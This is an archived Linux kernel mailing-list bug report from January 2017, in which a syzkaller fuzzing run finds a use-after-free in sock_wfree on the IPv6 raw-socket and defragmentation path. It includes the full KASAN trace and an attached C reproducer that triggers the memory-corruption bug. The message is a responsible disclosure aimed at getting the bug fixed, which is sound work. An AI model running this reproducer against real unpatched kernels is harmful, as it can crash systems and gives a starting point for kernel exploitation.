From: Andrey Konovalov <andreyknvl@google.com>
To: "David S. Miller" <davem@davemloft.net>,
Alexey Kuznetsov <kuznet@ms2.inr.ac.ru>,
James Morris <jmorris@namei.org>,
Hideaki YOSHIFUJI <yoshfuji@linux-ipv6.org>,
Patrick McHardy <kaber@trash.net>,
netdev <netdev@vger.kernel.org>,
LKML <linux-kernel@vger.kernel.org>
Cc: Dmitry Vyukov <dvyukov@google.com>,
Kostya Serebryany <kcc@google.com>,
Eric Dumazet <edumazet@google.com>,
syzkaller <syzkaller@googlegroups.com>
Subject: net/ipv6: use-after-free in sock_wfree
Date: Mon, 9 Jan 2017 18:08:54 +0100 [thread overview]
Message-ID: <CAAeHK+yfNdNTkgCbUGbdRBM9bB=2DhGv1ZPCWm44CGL7zD=TLg@mail.gmail.com> (raw)
[-- Attachment #1: Type: text/plain, Size: 5712 bytes --]
Hi!
I've got the following error report while running the syzkaller fuzzer.
On commit a121103c922847ba5010819a3f250f1f7fc84ab8 (4.10-rc3).
A reproducer is attached.
==================================================================
BUG: KASAN: use-after-free in sock_wfree+0x118/0x120
Read of size 8 at addr ffff880062da0060 by task a.out/4140
page:ffffea00018b6800 count:1 mapcount:0 mapping: (null)
index:0x0 compound_mapcount: 0
flags: 0x100000000008100(slab|head)
raw: 0100000000008100 0000000000000000 0000000000000000 0000000180130013
raw: dead000000000100 dead000000000200 ffff88006741f140 0000000000000000
page dumped because: kasan: bad access detected
CPU: 0 PID: 4140 Comm: a.out Not tainted 4.10.0-rc3+ #59
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
Call Trace:
__dump_stack lib/dump_stack.c:15
dump_stack+0x292/0x398 lib/dump_stack.c:51
describe_address mm/kasan/report.c:262
kasan_report_error+0x121/0x560 mm/kasan/report.c:370
kasan_report mm/kasan/report.c:392
__asan_report_load8_noabort+0x3e/0x40 mm/kasan/report.c:413
sock_flag ./arch/x86/include/asm/bitops.h:324
sock_wfree+0x118/0x120 net/core/sock.c:1631
skb_release_head_state+0xfc/0x250 net/core/skbuff.c:655
skb_release_all+0x15/0x60 net/core/skbuff.c:668
__kfree_skb+0x15/0x20 net/core/skbuff.c:684
kfree_skb+0x16e/0x4e0 net/core/skbuff.c:705
inet_frag_destroy+0x121/0x290 net/ipv4/inet_fragment.c:304
inet_frag_put ./include/net/inet_frag.h:133
nf_ct_frag6_gather+0x1125/0x38b0 net/ipv6/netfilter/nf_conntrack_reasm.c:617
ipv6_defrag+0x21b/0x350 net/ipv6/netfilter/nf_defrag_ipv6_hooks.c:68
nf_hook_entry_hookfn ./include/linux/netfilter.h:102
nf_hook_slow+0xc3/0x290 net/netfilter/core.c:310
nf_hook ./include/linux/netfilter.h:212
__ip6_local_out+0x52c/0xaf0 net/ipv6/output_core.c:160
ip6_local_out+0x2d/0x170 net/ipv6/output_core.c:170
ip6_send_skb+0xa1/0x340 net/ipv6/ip6_output.c:1722
ip6_push_pending_frames+0xb3/0xe0 net/ipv6/ip6_output.c:1742
rawv6_push_pending_frames net/ipv6/raw.c:613
rawv6_sendmsg+0x2cff/0x4130 net/ipv6/raw.c:927
inet_sendmsg+0x164/0x5b0 net/ipv4/af_inet.c:744
sock_sendmsg_nosec net/socket.c:635
sock_sendmsg+0xca/0x110 net/socket.c:645
sock_write_iter+0x326/0x620 net/socket.c:848
new_sync_write fs/read_write.c:499
__vfs_write+0x483/0x760 fs/read_write.c:512
vfs_write+0x187/0x530 fs/read_write.c:560
SYSC_write fs/read_write.c:607
SyS_write+0xfb/0x230 fs/read_write.c:599
entry_SYSCALL_64_fastpath+0x1f/0xc2 arch/x86/entry/entry_64.S:203
RIP: 0033:0x7ff26e6f5b79
RSP: 002b:00007ff268e0ed98 EFLAGS: 00000206 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 00007ff268e0f9c0 RCX: 00007ff26e6f5b79
RDX: 0000000000000010 RSI: 0000000020f50fe1 RDI: 0000000000000003
RBP: 00007ff26ebc1220 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000206 R12: 0000000000000000
R13: 00007ff268e0f9c0 R14: 00007ff26efec040 R15: 0000000000000003
The buggy address belongs to the object at ffff880062da0000
which belongs to the cache RAWv6 of size 1504
The buggy address ffff880062da0060 is located 96 bytes inside
of 1504-byte region [ffff880062da0000, ffff880062da05e0)
Freed by task 4113:
save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:57
save_stack+0x43/0xd0 mm/kasan/kasan.c:502
set_track mm/kasan/kasan.c:514
kasan_slab_free+0x73/0xc0 mm/kasan/kasan.c:578
slab_free_hook mm/slub.c:1352
slab_free_freelist_hook mm/slub.c:1374
slab_free mm/slub.c:2951
kmem_cache_free+0xb2/0x2c0 mm/slub.c:2973
sk_prot_free net/core/sock.c:1377
__sk_destruct+0x49c/0x6e0 net/core/sock.c:1452
sk_destruct+0x47/0x80 net/core/sock.c:1460
__sk_free+0x57/0x230 net/core/sock.c:1468
sk_free+0x23/0x30 net/core/sock.c:1479
sock_put ./include/net/sock.h:1638
sk_common_release+0x31e/0x4e0 net/core/sock.c:2782
rawv6_close+0x54/0x80 net/ipv6/raw.c:1214
inet_release+0xed/0x1c0 net/ipv4/af_inet.c:425
inet6_release+0x50/0x70 net/ipv6/af_inet6.c:431
sock_release+0x8d/0x1e0 net/socket.c:599
sock_close+0x16/0x20 net/socket.c:1063
__fput+0x332/0x7f0 fs/file_table.c:208
____fput+0x15/0x20 fs/file_table.c:244
task_work_run+0x19b/0x270 kernel/task_work.c:116
exit_task_work ./include/linux/task_work.h:21
do_exit+0x186b/0x2800 kernel/exit.c:839
do_group_exit+0x149/0x420 kernel/exit.c:943
SYSC_exit_group kernel/exit.c:954
SyS_exit_group+0x1d/0x20 kernel/exit.c:952
entry_SYSCALL_64_fastpath+0x1f/0xc2 arch/x86/entry/entry_64.S:203
Allocated by task 4115:
save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:57
save_stack+0x43/0xd0 mm/kasan/kasan.c:502
set_track mm/kasan/kasan.c:514
kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:605
kasan_slab_alloc+0x12/0x20 mm/kasan/kasan.c:544
slab_post_alloc_hook mm/slab.h:432
slab_alloc_node mm/slub.c:2708
slab_alloc mm/slub.c:2716
kmem_cache_alloc+0x1af/0x250 mm/slub.c:2721
sk_prot_alloc+0x65/0x2a0 net/core/sock.c:1334
sk_alloc+0x105/0x1010 net/core/sock.c:1396
inet6_create+0x44d/0x1150 net/ipv6/af_inet6.c:183
__sock_create+0x4f6/0x880 net/socket.c:1199
sock_create net/socket.c:1239
SYSC_socket net/socket.c:1269
SyS_socket+0xf9/0x230 net/socket.c:1249
entry_SYSCALL_64_fastpath+0x1f/0xc2 arch/x86/entry/entry_64.S:203
Memory state around the buggy address:
ffff880062d9ff00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff880062d9ff80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ffff880062da0000: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
^
ffff880062da0080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff880062da0100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
[-- Attachment #2: ipv6-wfree-uaf-poc.c --]
[-- Type: text/x-csrc, Size: 9719 bytes --]
// autogenerated by syzkaller (http://github.com/google/syzkaller)
#ifndef __NR_ioctl
#define __NR_ioctl 16
#endif
#ifndef __NR_mmap
#define __NR_mmap 9
#endif
#ifndef __NR_socket
#define __NR_socket 41
#endif
#ifndef __NR_connect
#define __NR_connect 42
#endif
#ifndef __NR_bind
#define __NR_bind 49
#endif
#ifndef __NR_sendto
#define __NR_sendto 44
#endif
#ifndef __NR_recvfrom
#define __NR_recvfrom 45
#endif
#ifndef __NR_write
#define __NR_write 1
#endif
#define _GNU_SOURCE
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <linux/capability.h>
#include <linux/if.h>
#include <linux/if_tun.h>
#include <linux/sched.h>
#include <net/if_arp.h>
#include <assert.h>
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <pthread.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
const int kFailStatus = 67;
const int kErrorStatus = 68;
const int kRetryStatus = 69;
__attribute__((noreturn)) void doexit(int status)
{
syscall(__NR_exit_group, status);
volatile unsigned i = 0;
for (i = 0;; i++) {
}
}
__attribute__((noreturn)) void fail(const char* msg, ...)
{
int e = errno;
fflush(stdout);
va_list args;
va_start(args, msg);
vfprintf(stderr, msg, args);
va_end(args);
fprintf(stderr, " (errno %d)\n", e);
doexit(e == ENOMEM ? kRetryStatus : kFailStatus);
}
__attribute__((noreturn)) void exitf(const char* msg, ...)
{
int e = errno;
fflush(stdout);
va_list args;
va_start(args, msg);
vfprintf(stderr, msg, args);
va_end(args);
fprintf(stderr, " (errno %d)\n", e);
doexit(kRetryStatus);
}
static int flag_debug;
void debug(const char* msg, ...)
{
if (!flag_debug)
return;
va_list args;
va_start(args, msg);
vfprintf(stdout, msg, args);
va_end(args);
fflush(stdout);
}
__thread int skip_segv;
__thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* uctx)
{
if (__atomic_load_n(&skip_segv, __ATOMIC_RELAXED))
_longjmp(segv_env, 1);
doexit(sig);
for (;;) {
}
}
static void install_segv_handler()
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
{ \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
}
static uintptr_t execute_syscall(int nr, uintptr_t a0, uintptr_t a1,
uintptr_t a2, uintptr_t a3,
uintptr_t a4, uintptr_t a5,
uintptr_t a6, uintptr_t a7,
uintptr_t a8)
{
switch (nr) {
default:
return syscall(nr, a0, a1, a2, a3, a4, a5);
}
}
static void setup_main_process(uint64_t pid, bool enable_tun)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
install_segv_handler();
char tmpdir_template[] = "./syzkaller.XXXXXX";
char* tmpdir = mkdtemp(tmpdir_template);
if (!tmpdir)
fail("failed to mkdtemp");
if (chmod(tmpdir, 0777))
fail("failed to chmod");
if (chdir(tmpdir))
fail("failed to chdir");
}
static void loop();
static void sandbox_common()
{
prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
setpgrp();
setsid();
struct rlimit rlim;
rlim.rlim_cur = rlim.rlim_max = 128 << 20;
setrlimit(RLIMIT_AS, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_FSIZE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_STACK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);
unshare(CLONE_NEWNS);
unshare(CLONE_NEWIPC);
unshare(CLONE_IO);
}
static int do_sandbox_none()
{
int pid = fork();
if (pid)
return pid;
sandbox_common();
loop();
doexit(1);
}
long r[56];
void* thr(void* arg)
{
switch ((long)arg) {
case 0:
r[0] =
execute_syscall(__NR_mmap, 0x20000000ul, 0xf55000ul, 0x3ul,
0x32ul, 0xfffffffffffffffful, 0x0ul, 0, 0, 0);
break;
case 1:
r[1] = execute_syscall(__NR_socket, 0xaul, 0x3ul, 0x2cul, 0, 0, 0,
0, 0, 0);
break;
case 2:
NONFAILING(*(uint16_t*)0x20016000 = (uint16_t)0xa);
NONFAILING(*(uint16_t*)0x20016002 = (uint16_t)0x204e);
NONFAILING(*(uint32_t*)0x20016004 = (uint32_t)0x0);
NONFAILING(*(uint64_t*)0x20016008 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20016010 = (uint64_t)0x0);
NONFAILING(*(uint32_t*)0x20016018 = (uint32_t)0x0);
r[8] = execute_syscall(__NR_connect, r[1], 0x20016000ul, 0x20ul, 0,
0, 0, 0, 0, 0);
break;
case 3:
NONFAILING(*(uint16_t*)0x20373000 = (uint16_t)0x2);
NONFAILING(*(uint16_t*)0x20373002 = (uint16_t)0x204e);
NONFAILING(*(uint8_t*)0x20373004 = (uint8_t)0xc0);
NONFAILING(*(uint8_t*)0x20373005 = (uint8_t)0xa8);
NONFAILING(*(uint8_t*)0x20373006 = (uint8_t)0xda);
NONFAILING(*(uint8_t*)0x20373007 = (uint8_t)0xaa);
NONFAILING(*(uint8_t*)0x20373008 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20373009 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2037300a = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2037300b = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2037300c = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2037300d = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2037300e = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2037300f = (uint8_t)0x0);
r[23] = execute_syscall(__NR_bind, 0xfffffffffffffffful,
0x20373000ul, 0x10ul, 0, 0, 0, 0, 0, 0);
break;
case 4:
NONFAILING(*(uint16_t*)0x20f4a000 = (uint16_t)0x0);
NONFAILING(*(uint16_t*)0x20f4a002 = (uint16_t)0x204e);
NONFAILING(*(uint32_t*)0x20f4a004 = (uint32_t)0x0);
NONFAILING(*(uint8_t*)0x20f4a008 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20f4a009 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20f4a00a = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20f4a00b = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20f4a00c = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20f4a00d = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20f4a00e = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x20f4a00f = (uint8_t)0x0);
r[35] = execute_syscall(__NR_connect, 0xfffffffffffffffful,
0x20f4a000ul, 0x10ul, 0, 0, 0, 0, 0, 0);
break;
case 5:
NONFAILING(*(uint16_t*)0x20f4cfe0 = (uint16_t)0xa);
NONFAILING(*(uint16_t*)0x20f4cfe2 = (uint16_t)0x204e);
NONFAILING(*(uint32_t*)0x20f4cfe4 = (uint32_t)0x0);
NONFAILING(*(uint64_t*)0x20f4cfe8 = (uint64_t)0x0);
NONFAILING(*(uint64_t*)0x20f4cff0 = (uint64_t)0x100000000000000);
NONFAILING(*(uint32_t*)0x20f4cff8 = (uint32_t)0x5);
r[42] =
execute_syscall(__NR_sendto, 0xfffffffffffffffful, 0x20006000ul,
0x0ul, 0x0ul, 0x20f4cfe0ul, 0x20ul, 0, 0, 0);
break;
case 6:
r[43] = execute_syscall(__NR_recvfrom, 0xfffffffffffffffful,
0x20144f28ul, 0x0ul, 0x10000ul,
0x20f4e000ul, 0x0ul, 0, 0, 0);
break;
case 7:
r[44] = execute_syscall(__NR_socket, 0x1ful, 0x5ul, 0x2ul, 0, 0, 0,
0, 0, 0);
break;
case 8:
r[45] = execute_syscall(__NR_write, r[1], 0x20aa4fdaul, 0xfffful, 0,
0, 0, 0, 0, 0);
break;
case 9:
NONFAILING(*(uint32_t*)0x20f54000 = (uint32_t)0x0);
NONFAILING(*(uint32_t*)0x20f54004 = (uint32_t)0x0);
NONFAILING(*(uint64_t*)0x20f54008 = (uint64_t)0x0);
r[49] =
execute_syscall(__NR_ioctl, 0xfffffffffffffffful, 0xc010640bul,
0x20f54000ul, 0, 0, 0, 0, 0, 0);
break;
case 10:
NONFAILING(*(uint32_t*)0x20f54000 = (uint32_t)0x0);
NONFAILING(*(uint32_t*)0x20f54004 = (uint32_t)0x0);
NONFAILING(*(uint64_t*)0x20f54008 = (uint64_t)0xfc51);
r[53] =
execute_syscall(__NR_ioctl, 0xfffffffffffffffful, 0xc010640bul,
0x20f54000ul, 0, 0, 0, 0, 0, 0);
break;
case 11:
NONFAILING(memcpy((void*)0x20f50fe1, "\x1f\x00\x00\x80\x01\x00\x00"
"\x16\x00\x00\x00\x9a\xc7\x00"
"\x00\x06",
16));
r[55] = execute_syscall(__NR_write, r[1], 0x20f50fe1ul, 0x10ul, 0,
0, 0, 0, 0, 0);
break;
}
return 0;
}
void loop()
{
long i;
pthread_t th[24];
memset(r, -1, sizeof(r));
srand(getpid());
for (i = 0; i < 12; i++) {
pthread_create(&th[i], 0, thr, (void*)i);
usleep(10000);
}
for (i = 0; i < 12; i++) {
pthread_create(&th[12 + i], 0, thr, (void*)i);
if (rand() % 2)
usleep(rand() % 10000);
}
usleep(100000);
}
int main()
{
setup_main_process(0, false);
int pid = do_sandbox_none();
int status = 0;
while (waitpid(pid, &status, __WALL) != pid) {
}
return 0;
}
next reply other threads:[~2017-01-09 17:09 UTC|newest]
Thread overview: 7+ messages / expand[flat|nested] mbox.gz Atom feed top
2017-01-09 17:08 Andrey Konovalov [this message]
2017-01-09 17:11 ` net/ipv6: use-after-free in sock_wfree Andrey Konovalov
2017-01-09 17:21 ` Eric Dumazet
2017-01-09 19:06 ` Andrey Konovalov
2017-01-09 19:08 ` Eric Dumazet
2017-01-10 11:52 ` Andrey Konovalov
2017-02-12 16:53 ` Andrey Konovalov
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to='CAAeHK+yfNdNTkgCbUGbdRBM9bB=2DhGv1ZPCWm44CGL7zD=TLg@mail.gmail.com' \
--to=andreyknvl@google.com \
--cc=davem@davemloft.net \
--cc=dvyukov@google.com \
--cc=edumazet@google.com \
--cc=jmorris@namei.org \
--cc=kaber@trash.net \
--cc=kcc@google.com \
--cc=kuznet@ms2.inr.ac.ru \
--cc=linux-kernel@vger.kernel.org \
--cc=netdev@vger.kernel.org \
--cc=syzkaller@googlegroups.com \
--cc=yoshfuji@linux-ipv6.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.